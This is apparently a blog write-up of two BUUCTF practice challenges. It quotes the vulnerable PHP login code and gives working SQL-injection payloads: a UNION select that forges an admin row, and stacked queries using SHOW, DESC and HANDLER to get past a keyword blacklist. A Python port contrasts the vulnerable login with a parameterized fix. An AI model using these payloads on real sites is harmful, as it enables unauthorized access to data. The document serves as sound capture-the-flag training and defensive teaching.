BUUCTF Practice Notes (14)

§ [GXYCTF2019]BabySQli

§ [GYCTF2020]Blacklist

[GXYCTF2019]BabySQli

mysqli_query($con,'SET NAMES UTF8');
$name = $_POST['name'];
$password = $_POST['pw'];
$t_pw = md5($password);
// $name is concatenated straight into the query; the preg_match below is the only guard
$sql = "select * from user where username = '".$name."'";
// echo $sql;
$result = mysqli_query($con, $sql);

if(preg_match("/\(|\)|\=|or/", $name)){
	die("do not hack me!");
}
else{
	if (!$result) {
		printf("Error: %s\n", mysqli_error($con));
		exit();
	}
	else{
		// echo '<pre>';
		// only the first row is inspected, and that row alone decides who counts as "admin"
		$arr = mysqli_fetch_row($result);
		// print_r($arr);
		if($arr[1] == "admin"){
			// loose == comparison of the submitted password's MD5 against column 3 of the returned row
			if(md5($password) == $arr[2]){
				echo $flag;
			}
			else{
				die("wrong pass!");
			}
		}
		else{
			die("wrong user!");
		}
	}
}

hint MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5

base32 decode: c2VsZWN0ICogZnJvbSB1c2VyIHdoZXJlIHVzZXJuYW1lID0gJyRuYW1lJw==

base64 decode: select * from user where username = '$name'

Trial and error shows the username is admin.

fuzz

The filter blocks ( ) = and or; since xor and order contain "or", they are blocked as well.

The second column holds the username and the third the MD5 hash of the password.

name=' union select 1,'admin','21232f297a57a5a743894a0e4a801fc3' #&pw=admin
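To show why the UNION payload above passes the check and how a bound parameter closes the hole, here is an added Python port of the challenge's login logic (not the challenge's own code). It assumes an in-memory SQLite table with a constructed admin row, and uses SQLite's `--` comment where MySQL accepts `#`.

```python
import hashlib
import hmac
import re
import sqlite3

# Constructed stand-in for the challenge table: id, username, md5(password).
# The real admin hash is unknown, so an arbitrary one is inserted.
def build_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE user (id INTEGER, username TEXT, password TEXT)")
    con.execute("INSERT INTO user VALUES (1, 'admin', ?)",
                (hashlib.md5(b"unknown-real-password").hexdigest(),))
    return con

BLACKLIST = re.compile(r"\(|\)|=|or")  # the challenge's preg_match, ported as-is

def vulnerable_login(con, name, pw):
    """Mirrors the challenge: string-built SQL, then trusts whatever row comes back."""
    if BLACKLIST.search(name):
        return "do not hack me!"
    sql = "select * from user where username = '" + name + "'"
    row = con.execute(sql).fetchone()
    if row is None or row[1] != "admin":
        return "wrong user!"
    # If a UNION changed the query's shape, this row came from the input, not the table,
    # so the caller also chose the hash that the submitted password is compared against.
    return "flag" if hashlib.md5(pw.encode()).hexdigest() == row[2] else "wrong pass!"

def hardened_login(con, name, pw):
    """Bound parameter: the input is only ever a value, so it cannot add rows."""
    row = con.execute("select * from user where username = ?", (name,)).fetchone()
    if row is None or row[1] != "admin":
        return "wrong user!"
    # Constant-time compare; a real app should store a slow salted hash (bcrypt etc.), not MD5.
    digest = hashlib.md5(pw.encode()).hexdigest()
    return "flag" if hmac.compare_digest(digest, row[2]) else "wrong pass!"

if __name__ == "__main__":
    con = build_db()
    # the writeup's payload, with SQLite's "--" comment in place of MySQL's "#"
    payload = "' union select 1,'admin','21232f297a57a5a743894a0e4a801fc3' -- "
    print(vulnerable_login(con, payload, "admin"))  # flag
    print(hardened_login(con, payload, "admin"))    # wrong user!
```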

[GYCTF2020]Blacklist

Union-based injection

-1' or 1=1 order by 3 #

error 1054 : Unknown column '3' in 'order clause'

-1' union select 1,2 #

return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject);

Stacked injection

-1';show tables #

array(1) {
[0]=>
string(8) "FlagHere"
}

array(1) {
[0]=>
string(5) "words"
}

-1';desc FlagHere #

array(6) {
[0]=>
string(4) "flag"
[1]=>
string(12) "varchar(100)"
[2]=>
string(2) "NO"
[3]=>
string(0) ""
[4]=>
NULL
[5]=>
string(0) ""
}

HANDLER query

Similar to [强网杯 2019]随便注, but here set, prepare, alter and rename are filtered as well.

Query with the HANDLER statement instead.

-1';handler FlagHere open;handler FlagHere read first;handler FlagHere close; #

Summary

  1. The HANDLER … READ statement reads the specified table directly.

https://ba2in9a.top/85bfc6b
Author: ba2in9a
Published: 10 March 2022
Updated: 23 April 2022